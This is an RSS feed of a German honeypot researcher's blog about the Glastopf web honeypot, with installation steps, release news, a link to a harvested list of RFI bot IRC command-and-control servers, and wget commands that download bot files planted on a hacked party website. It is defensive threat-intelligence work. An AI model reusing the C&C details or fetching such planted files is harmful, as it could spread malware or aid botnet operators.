<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    <title>blog.grospolina.net - glastopf</title>
    <link>http://blog.grospolina.net/</link>
    <description>Katsumi's weblog</description>
    <dc:language>en</dc:language>
    <generator>Serendipity 1.6-alpha1 - http://www.s9y.org/</generator>
    <pubDate>Sat, 13 Feb 2010 08:20:19 GMT</pubDate>

    <image>
        <url>http://blog.grospolina.net/templates/default/img/s9y_banner_small.png</url>
        <title>RSS: blog.grospolina.net - glastopf - Katsumi's weblog</title>
        <link>http://blog.grospolina.net/</link>
        <width>100</width>
        <height>21</height>
    </image>

<item>
    <title>GlasCon 2010</title>
    <link>http://blog.grospolina.net/archives/80-GlasCon-2010.html</link>
            <category>glastopf</category>
    
    <comments>http://blog.grospolina.net/archives/80-GlasCon-2010.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=80</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=80</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    Dieses Jahr findet die zweite &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL2dsYXN0b3BmLm9yZw==&amp;amp;entry_id=80&quot;  onmouseover=&quot;window.status=&#039;http://glastopf.org&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Glastopf honeypot&quot;&gt;Glastopf&lt;/a&gt;-Zusammenkunft in Karlsruhe statt.&lt;br /&gt;
Näheres findet ihr unter:&lt;br /&gt;
&lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL2Rldi5nbGFzdG9wZi5vcmcvd2lraS9nbGFzdG9wZi9HbGFzQ29u&amp;amp;entry_id=80&quot;  onmouseover=&quot;window.status=&#039;http://dev.glastopf.org/wiki/glastopf/GlasCon&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;http://dev.glastopf.org/wiki/glastopf/GlasCon&quot;&gt;http://dev.glastopf.org/wiki/glastopf/GlasCon&lt;/a&gt;&lt;br /&gt;
9l &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3d3dy52b2dlbGJyYWV1LmRlLw==&amp;amp;entry_id=80&quot;  onmouseover=&quot;window.status=&#039;http://www.vogelbraeu.de/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Vogel lecker Bier&quot;&gt;Vogelbräu&lt;/a&gt; gehen auf mich.&lt;br /&gt;
Aber erwartet keinen Vortrag von mir...  :) 
    </content:encoded>

    <pubDate>Sat, 13 Feb 2010 08:45:05 +0100</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/80-guid.html</guid>
    
</item>
<item>
    <title>Installation des Glastopf Honeypot - Teil1</title>
    <link>http://blog.grospolina.net/archives/73-Installation-des-Glastopf-Honeypot-Teil1.html</link>
            <category>glastopf</category>
    
    <comments>http://blog.grospolina.net/archives/73-Installation-des-Glastopf-Honeypot-Teil1.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=73</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=73</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    &lt;b&gt;&lt;u&gt;Installation des Glastopf Honeypot in der &lt;i&gt;unstable&lt;/i&gt; Version&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
Heute will ich endlich die letzte Version vom Glastopf Webhoneypot installieren.&lt;br /&gt;
Ich schreibe dabei einfach mit und hoffe, dass dies eine Hilfe für euch sein kann,&lt;br /&gt;
falls ihr das gleiche Vorhaben habt&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Schritt 1: Herunterladen der letzten Version&lt;/b&gt;&lt;br /&gt;
Zum Herunterladen der letzten &lt;i&gt;unstable&lt;/i&gt; Version benötigen wir ein Programm namens &lt;i&gt;Subversion&lt;/i&gt;.&lt;br /&gt;
Das kann man sich entweder mit &quot;apt-get install subversion&quot; installieren oder,&lt;br /&gt;
falls ihr kein &quot;apt&quot; habt, geht halt auf &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3N1YnZlcnNpb24udGlncmlzLm9yZy9nZXR0aW5nLmh0bWw=&amp;amp;entry_id=73&quot;  onmouseover=&quot;window.status=&#039;http://subversion.tigris.org/getting.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Subversion Download&quot; target=&quot;_blank&quot;&gt;Subversion Download&lt;/a&gt;&lt;br /&gt;
Wenn das erledigt ist, kann es losgehen!&lt;br /&gt;
Der Befehl lautet:&lt;br /&gt;
&quot;svn co svn://88.198.38.89:9090/branches/unstable glastopf&quot;&lt;br /&gt;
Bei Erfolg seht ihr ein &quot;Ausgecheckt, Revision 189.&quot;. Oder halt die aktuelle Revisionsnummer anstatt 189.&lt;br /&gt;
&lt;br /&gt;&lt;b&gt;Schritt 2: Den Glastopf konfigurieren&lt;/b&gt;&lt;br /&gt;
Wir wechseln ins Verzeichnis &quot;glastopf/conf&quot;.&lt;br /&gt;
Dort finden wir drei Dateien:&lt;br /&gt;
&lt;i&gt;dbclient.cfg  glastopf.cfg  surfids.cfg&lt;/i&gt;&lt;br /&gt;
Schauen wir uns zunächst die &quot;glastopf.cfg&quot; an:&lt;br /&gt;
Wir tragen erstmal nur IP und Port und user/group ein.&lt;br /&gt;
Weil ich ja so neugierig bin starte ich den Glastopf einfachmal:&lt;br /&gt;
&lt;PRE&gt;
glasihasi@hasiserver$ python2.5 webserver.py

            __             __                ___
     .-----|  .---.-.-----|  |_.-----.-----.&#039;  _|
     |  _  |  |  _  |__ --|   _|  _  |  _  |   _|
     |___  |__|___._|_____|____|_____|   __|__|
     |_____|by: lukas rist           |__|
     Version: 0.2.1

== Loading modules... ==
Logging modules loaded
Vulnerability path handling module loaded
URL handling module loaded
File retrieving and saving module loaded
Base64 decode module loaded
Echo parser loaded
Injected file parser module loaded
Echo parser loaded
Twitter logging module loaded
== All modules loaded ==
Dropping rights (if possible)
Changed files folder owner from: 0 to 1001
Changed uid from: 0 to 1001
Changed uid from: 0 to 1001
Changed umask from: 022 to 077
Starting Glastopf server, use &lt;Ctrl-c&gt; to stop.
&lt;/PRE&gt;
Das sieht ja schonmal gut aus!&lt;br /&gt;&lt;br /&gt;
Wahrscheinlich will der aber bei euch nicht laufen,&lt;br /&gt;
weil noch Module fehlen oder kein Python installiert ist.&lt;br /&gt;
&lt;br /&gt;&lt;b&gt;Schritt 3: Fehlende Module/Python installieren&lt;/b&gt;&lt;br /&gt;
&quot;apt-get install python2.5 python-mysqldb&quot;&lt;br /&gt;
Danach sollte es funktionieren.&lt;br /&gt;
Python-mysqldb liegt evt. im test-Pfad bei debian.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;



&lt;i&gt;Fortsetzung folgt...&lt;/i&gt; 
    </content:encoded>

    <pubDate>Thu, 15 Oct 2009 08:03:29 +0200</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/73-guid.html</guid>
    
</item>
<item>
    <title>rfi bot Command&amp;Control servers list</title>
    <link>http://blog.grospolina.net/archives/70-rfi-bot-CommandControl-servers-list.html</link>
            <category>glastopf</category>
    
    <comments>http://blog.grospolina.net/archives/70-rfi-bot-CommandControl-servers-list.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=70</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=70</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    ...anbei eine Liste von IRC-Servern, wohin &lt;i&gt;pbots&lt;/i&gt; sich verbinden wollten.&lt;br /&gt;
Die Daten wurden mit einem Glastopf (webhoneypot) gesammelt.&lt;br /&gt;
Die Liste wurde generiert aus 28834 Dateien,&lt;br /&gt;
einige sind sehr alt, also haut mich nicht, wenn manche nicht mehr gehen,&lt;br /&gt;
da auch Einträge bis zurück zu November 2008  bearbeitet wurden.;)&lt;br /&gt;
&lt;br /&gt;
Das Trennzeichen in der Liste ist &quot;:&quot;.&lt;br /&gt;
Der Aufbau ist wie folgt:&lt;br /&gt;
&lt;pre&gt;
$filename:$server:$port:$pass:$prefix:$maxrand:$chan:$chan2:$key:$modes:$password:$trigger:$hostauth
&lt;/pre&gt;
&lt;br /&gt;
wobei filename die MD5sum des bots darstellt&lt;br /&gt;
Ich denke der Rest ist selbst erklärend.&lt;br /&gt;
&lt;br /&gt;
Viel Spass mit der Liste,  ich hoffe es sind noch aktive dabei. ;)&lt;br /&gt;&lt;br /&gt;
&lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL2dyb3Nwb2xpbmEub3JnL2NuYy50eHQ=&amp;amp;entry_id=70&quot;  onmouseover=&quot;window.status=&#039;http://grospolina.org/cnc.txt&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;CnC list&quot; target=_blank&gt;&lt;b&gt;rfi bot Command&amp;Control servers list&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;Einen Schnipp-Schnapp gibts hier:&lt;br /&gt;

 &lt;br /&gt;&lt;a href=&quot;http://blog.grospolina.net/archives/70-rfi-bot-CommandControl-servers-list.html#extended&quot;&gt;Continue reading &quot;rfi bot Command&amp;amp;Control servers list&quot;&lt;/a&gt;
    </content:encoded>

    <pubDate>Tue, 22 Sep 2009 10:13:52 +0200</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/70-guid.html</guid>
    
</item>
<item>
    <title>NPD Nordhausen hacked</title>
    <link>http://blog.grospolina.net/archives/68-NPD-Nordhausen-hacked.html</link>
            <category>botnet</category>
            <category>glastopf</category>
            <category>malware</category>
    
    <comments>http://blog.grospolina.net/archives/68-NPD-Nordhausen-hacked.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=68</wfw:comment>

    <slash:comments>3</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=68</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    &lt;u&gt;&lt;b&gt;Webpräsenz des Kreisverbandes Nordhausen der NPD von Indonesiern übernommen&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;
&lt;i&gt;Für die Serie &quot;gehackte Parteienhomepages&quot; hat sich erfolgreich die NPD beworben.&lt;/i&gt;&lt;br /&gt;
Ein bösliches Individuum namens &quot;Anggun Pradesi&quot; aus Indonesien benutzt derzeit&lt;br /&gt;
die Homepage der NPD Nordhausen als Verteiler für bots.&lt;br /&gt;
Nachdem ich ja schon die FDP und die SPD zwischen hatte,&lt;br /&gt;
muss ich, weil ich ja unpolitisch bin, natürlich auch über diesen Fund auf unseren honeypots berichten.&lt;br /&gt;
Freundlicherweise können wir uns den Index anzeigen lassen.&lt;br /&gt;
&lt;PRE&gt;
playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/
--20:02:12--  http://www.npd-nordhausen.de/files//redaxo/
           =&gt; `index.html&#039;
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 543 [text/html]
&lt;div class=&quot;bb-code-title&quot;&gt;CODE:&lt;/div&gt;&lt;div class=&quot;bb-code&quot;&gt;playmobile$&amp;#160;cat&amp;#160;index.html
....
&amp;#60;h1&amp;#62;Index&amp;#160;of&amp;#160;/files//redaxo&amp;#60;/h1&amp;#62;
&amp;#60;ul&amp;#62;&amp;#60;li&amp;#62;&amp;#60;a&amp;#160;href=&quot;http://blog.grospolina.net/files//&quot;&amp;#62;&amp;#160;Parent&amp;#160;Directory&amp;#60;/a&amp;#62;&amp;#60;/li&amp;#62;
&amp;#60;li&amp;#62;&amp;#60;a&amp;#160;href=&quot;ade.txt&quot;&amp;#62;&amp;#160;ade.txt&amp;#60;/a&amp;#62;&amp;#60;/li&amp;#62;
&amp;#60;li&amp;#62;&amp;#60;a&amp;#160;href=&quot;admin/&quot;&amp;#62;&amp;#160;admin/&amp;#60;/a&amp;#62;&amp;#60;/li&amp;#62;
&amp;#60;li&amp;#62;&amp;#60;a&amp;#160;href=&quot;idade1.txt&quot;&amp;#62;&amp;#160;idade1.txt&amp;#60;/a&amp;#62;&amp;#60;/li&amp;#62;
&amp;#60;li&amp;#62;&amp;#60;a&amp;#160;href=&quot;idade2.txt&quot;&amp;#62;&amp;#160;idade2.txt&amp;#60;/a&amp;#62;&amp;#60;/li&amp;#62;
&amp;#60;li&amp;#62;&amp;#60;a&amp;#160;href=&quot;includes/&quot;&amp;#62;&amp;#160;includes/&amp;#60;/a&amp;#62;&amp;#60;/li&amp;#62;
&amp;#60;li&amp;#62;&amp;#60;a&amp;#160;href=&quot;index.txt&quot;&amp;#62;&amp;#160;index.txt&amp;#60;/a&amp;#62;&amp;#60;/li&amp;#62;
&amp;#60;li&amp;#62;&amp;#60;a&amp;#160;href=&quot;topmenu.php&quot;&amp;#62;&amp;#160;topmenu.php&amp;#60;/a&amp;#62;&amp;#60;/li&amp;#62;
....&lt;/div&gt;
playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/index.txt
--18:54:28--  http://www.npd-nordhausen.de/files//redaxo/index.txt
           =&gt; `index.txt&#039;
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,558 (4.5K) [text/plain]

playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/ade.txt
--18:52:56--  http://www.npd-nordhausen.de/files//redaxo/ade.txt
           =&gt; `ade.txt&#039;
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53,181 (52K) [text/plain]

playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/idade1.txt
--18:53:40--  http://www.npd-nordhausen.de/files//redaxo/idade1.txt
           =&gt; `idade1.txt&#039;
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75 [text/plain]

playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/idade2.txt
--18:53:47--  http://www.npd-nordhausen.de/files//redaxo/idade2.txt
           =&gt; `idade2.txt&#039;
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,160 (2.1K) [text/plain]

&lt;/PRE&gt;


 &lt;br /&gt;&lt;a href=&quot;http://blog.grospolina.net/archives/68-NPD-Nordhausen-hacked.html#extended&quot;&gt;Continue reading &quot;NPD Nordhausen hacked&quot;&lt;/a&gt;
    </content:encoded>

    <pubDate>Mon, 24 Aug 2009 19:08:04 +0200</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/68-guid.html</guid>
    
</item>
<item>
    <title>glastopf: version 0.2.0 released</title>
    <link>http://blog.grospolina.net/archives/60-glastopf-version-0.2.0-released.html</link>
            <category>glastopf</category>
    
    <comments>http://blog.grospolina.net/archives/60-glastopf-version-0.2.0-released.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=60</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=60</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    Wie sich im &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL2dsYXNibG9nLjFkdXJjaDAuZGUvP3A9NTc2&amp;amp;entry_id=60&quot;  onmouseover=&quot;window.status=&#039;http://glasblog.1durch0.de/?p=576&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Glastopf 0.2.0 released&quot;&gt;Glasblog&lt;/a&gt; lesen lässt,&lt;br /&gt;
hat Lukas eine neue Version vom glastopf rausgehauen.&lt;br /&gt;
Das &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3RyYWMuMWR1cmNoMC5kZS90cmFjL2NoYW5nZXNldC8xNjY=&amp;amp;entry_id=60&quot;  onmouseover=&quot;window.status=&#039;http://trac.1durch0.de/trac/changeset/166&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;changeset 166&quot;&gt;Changeset&lt;/a&gt; bringt unter anderem&lt;br /&gt;
LFI zurück, bietet ein irc interface...&lt;br /&gt;
Schaut es Euch an!&lt;br /&gt;
Zu dem Twittermodul sag ich mal nix :p&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Sun, 21 Jun 2009 17:06:26 +0200</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/60-guid.html</guid>
    
</item>
<item>
    <title>[glastopf] blacklisted @ whois.ripe.net | fixed in rev.153</title>
    <link>http://blog.grospolina.net/archives/50-glastopf-blacklisted-whois.ripe.net-fixed-in-rev.153.html</link>
            <category>glastopf</category>
    
    <comments>http://blog.grospolina.net/archives/50-glastopf-blacklisted-whois.ripe.net-fixed-in-rev.153.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=50</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=50</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    Gestern abend habe ich erstmal blöd aus der Wäsche geschaut.&lt;br /&gt;
In der db waren bei einem meiner Glastöpfe plötzlich keine mnt-by - Daten mehr bei.&lt;br /&gt;
Ein händisch eingetipptes Ansprechen des Servers mit NetCat brachte Gewissheit:&lt;br /&gt;
Die vielen Angriffe haben dazu geführt, dass die IP des Glastopfes blacklisted wurde.&lt;br /&gt;
Den admins bei RIPE hab ich eine mail geschrieben, mal sehen, was die so sagen.&lt;br /&gt;
&lt;br /&gt;
Freundlicherweise dürfen wir nun den whois server bei &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovLzF1bmQxLmRl&amp;amp;entry_id=50&quot;  onmouseover=&quot;window.status=&#039;http://1und1.de&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;1&amp;1&quot;&gt;1&amp;1&lt;/a&gt; quälen,&lt;br /&gt;
womit das Problem zuvieler Anfragen erstmal ein wenig weggeschoben ist.&lt;br /&gt;
Danke an Mike dafür! (und den Hostmastern bei 1&amp;1) :)&lt;br /&gt;
&lt;br /&gt;
Die Änderungen im &lt;i&gt;whois.py&lt;/i&gt; Modul in Revision 153 könnt ihr hier einsehen:&lt;br /&gt;
&lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3RyYWMuZ2xhc3RvcGYub3JnL3RyYWMvY2hhbmdlc2V0LzE1Mw==&amp;amp;entry_id=50&quot;  onmouseover=&quot;window.status=&#039;http://trac.glastopf.org/trac/changeset/153&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;http://trac.glastopf.org/trac/changeset/153&quot; target=_blank&gt;http://trac.glastopf.org/trac/changeset/153&lt;/a&gt;
&lt;br /&gt;
&lt;b&gt;Update:&lt;/b&gt;&lt;br /&gt;
Ein freundlicher Mensch @RIPE hat meine IP entblockt.&lt;br /&gt;
Hätte ich nicht gedacht, dass dies so schnell geht.&lt;br /&gt; 
    </content:encoded>

    <pubDate>Wed, 29 Apr 2009 17:04:17 +0200</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/50-guid.html</guid>
    
</item>
<item>
    <title>[glastopf] rev. 128: master db und mehr</title>
    <link>http://blog.grospolina.net/archives/49-glastopf-rev.-128-master-db-und-mehr.html</link>
            <category>glastopf</category>
    
    <comments>http://blog.grospolina.net/archives/49-glastopf-rev.-128-master-db-und-mehr.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=49</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=49</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    Im &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL2dsYXN0b3BmLjFkdXJjaDAuZGU=&amp;amp;entry_id=49&quot;  onmouseover=&quot;window.status=&#039;http://glastopf.1durch0.de&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Glastopf Webhoneypot&quot;&gt;Glastopf&lt;/a&gt; wurde nun das Nutzen einer Datenbank,&lt;br /&gt;
in die verschiedene Glastöpfe ihre Daten ablegen können, implementiert.&lt;br /&gt;
Dem Nutzer steht es nun offen, nur in seine eigene Datenbank, nur in die Masterdb,&lt;br /&gt;
oder in beide zu schreiben.&lt;br /&gt;
Die Tabellenstruktur in der masterdb wurde soweit ausgedünnt,&lt;br /&gt;
dass nur noch für derer Zweck relevante Daten übertragen werden.&lt;br /&gt;
Projektmitglied Mike hat eine solche Datenbank aufgesetzt und &lt;br /&gt;
aktuell schreiben vier unabhängige Glastopf-Webhoneypots dort hinein.&lt;br /&gt;
Von den Daten der einzelnen &lt;i&gt;Glastöpfe&lt;/i&gt; können nun alle,&lt;br /&gt;
die bei der Entwicklung helfen, profitieren.&lt;br /&gt;
Insbesondere macht das Sinn, wenn man die Module etwas bearbeitet hat,&lt;br /&gt;
und noch nicht sicher ist, ob die Änderung erfolgreich war.&lt;br /&gt;
&lt;br /&gt;
Die Erfassung der mnt-by Einträge von den whois-Servern wurde auf das &quot;Opfer&quot; ausgedehnt.&lt;br /&gt;
Nun lassen sich durch einen einfachen mysql query alle IPs/domains aufspüren,&lt;br /&gt;
die für einen ISP und seine abuse/security Abteilung relevant sein könnten.&lt;br /&gt;
Also sowohl diese IPs, die als Angreifer fungieren, also wo der scanner oder Wurm läuft,&lt;br /&gt;
als auch die, die entsprechende bots/Skripte/shells auf dem System liegen haben,&lt;br /&gt;
höchstwahrscheinlich ohne etwas davon zu wissen.&lt;br /&gt;
Denn in den meisten Fällen sind das entweder Freehoster oder Opfer,&lt;br /&gt;
bei denen die &lt;i&gt;bösartigen&lt;/i&gt; Skripte abgelegt werden.&lt;br /&gt;
Ein solcher query könnte z.B. für das &lt;i&gt;INTERGENIA&lt;/i&gt;-Netz so aussehen:&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;&lt;a href=&quot;http://blog.grospolina.net/archives/49-glastopf-rev.-128-master-db-und-mehr.html#extended&quot;&gt;Continue reading &quot;[glastopf] rev. 128: master db und mehr&quot;&lt;/a&gt;
    </content:encoded>

    <pubDate>Fri, 24 Apr 2009 13:56:22 +0200</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/49-guid.html</guid>
    
</item>
<item>
    <title>[glastopf] Projekt beim GSoC</title>
    <link>http://blog.grospolina.net/archives/47-glastopf-Projekt-beim-GSoC.html</link>
            <category>glastopf</category>
    
    <comments>http://blog.grospolina.net/archives/47-glastopf-Projekt-beim-GSoC.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=47</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=47</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    Lukas Projekt ist beim &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3NvY2dob3AuYXBwc3BvdC5jb20vb3JnL2hvbWUvZ29vZ2xlL2dzb2MyMDA5L2hvbmV5bmV0&amp;amp;entry_id=47&quot;  onmouseover=&quot;window.status=&#039;http://socghop.appspot.com/org/home/google/gsoc2009/honeynet&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;GSoC&quot;&gt;GSoC&lt;/a&gt; angenommen worden.&lt;br /&gt;
...und noch erfreulicher ist, dass &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL2hvbmV5YmxvZy5vcmcvYXJjaGl2ZXMvMjctR1NvQy1VcGRhdGUuaHRtbA==&amp;amp;entry_id=47&quot;  onmouseover=&quot;window.status=&#039;http://honeyblog.org/archives/27-GSoC-Update.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;honeyblog.org&quot;&gt;Thorsten Holz&lt;/a&gt; sein Mentor sein wird.&lt;br /&gt;
&lt;br /&gt;
Besser hätte es nicht kommen können...&lt;br /&gt;
Ich wünsche Lukas viel Erfolg,&lt;br /&gt;
und freue mich auf die neuen Revisionen !
 
    </content:encoded>

    <pubDate>Wed, 22 Apr 2009 10:01:22 +0200</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/47-guid.html</guid>
    
</item>
<item>
    <title>[glastopf] Neues in rev. 115</title>
    <link>http://blog.grospolina.net/archives/42-glastopf-Neues-in-rev.-115.html</link>
            <category>glastopf</category>
            <category>honeypot</category>
    
    <comments>http://blog.grospolina.net/archives/42-glastopf-Neues-in-rev.-115.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=42</wfw:comment>

    <slash:comments>1</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=42</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    &lt;h2&gt;Neue Funktion im Glastopf webhoneypot&lt;/h2&gt;
Unser neues Projektmitglied Mike hat eine interessante Frage gestellt.&lt;br /&gt;
Ich habe daraufhin ein &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3RyYWMuMWR1cmNoMC5kZS90cmFjL3RpY2tldC81Nw==&amp;amp;entry_id=42&quot;  onmouseover=&quot;window.status=&#039;http://trac.1durch0.de/trac/ticket/57&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Glastopf Ticket 57&quot;&gt;&lt;i&gt;Ticket&lt;/i&gt;&lt;/a&gt; in unserer &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3RyYWMuMWR1cmNoMC5kZS90cmFj&amp;amp;entry_id=42&quot;  onmouseover=&quot;window.status=&#039;http://trac.1durch0.de/trac&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;project management&quot;&gt;Projektverwaltung&lt;/a&gt; eröffnet.&lt;br /&gt;&lt;br /&gt;
Zusammengefasst kann man es so ausdrücken:&lt;br /&gt;&lt;br /&gt;
Wie können wir das Betreiben eines &lt;i&gt;Glastopf&lt;/i&gt;es für Provider/Netzbetreiber interessant machen?&lt;br /&gt;
Indem wir die Verwertbarkeit und damit gekoppelt die Typisierung der Felder unserer Datenbank anpassen,&lt;br /&gt;
oder indem wir entsprechende Felder hinzufügen.&lt;br /&gt;
Ein Provider möchte zunächst erfassen was in &lt;b&gt;seinem&lt;/b&gt; Netz abläuft.&lt;br /&gt;
Somit wird erwartet, dass unser Werkzeug zum Beispiel alle Angreifer aus dem &lt;i&gt;Intergenia Netz&lt;/i&gt; benennen kann.&lt;br /&gt;
Konkret heisst das, wir müssen die IP des Angreifers dem Netz zuordnen können.&lt;br /&gt;
glaslos hat ein kleines &lt;i&gt;whois.py&lt;/i&gt;-Modul aus dem Ärmel geschüttelt, &lt;br /&gt;
welches diese Forderung erfüllt.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt; &lt;br /&gt;&lt;a href=&quot;http://blog.grospolina.net/archives/42-glastopf-Neues-in-rev.-115.html#extended&quot;&gt;Continue reading &quot;[glastopf] Neues in rev. 115&quot;&lt;/a&gt;
    </content:encoded>

    <pubDate>Sat, 04 Apr 2009 10:20:35 +0200</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/42-guid.html</guid>
    
</item>
<item>
    <title>[glastopf] Stand der Entwicklung</title>
    <link>http://blog.grospolina.net/archives/40-glastopf-Stand-der-Entwicklung.html</link>
            <category>glastopf</category>
            <category>honeypot</category>
    
    <comments>http://blog.grospolina.net/archives/40-glastopf-Stand-der-Entwicklung.html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=40</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=40</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
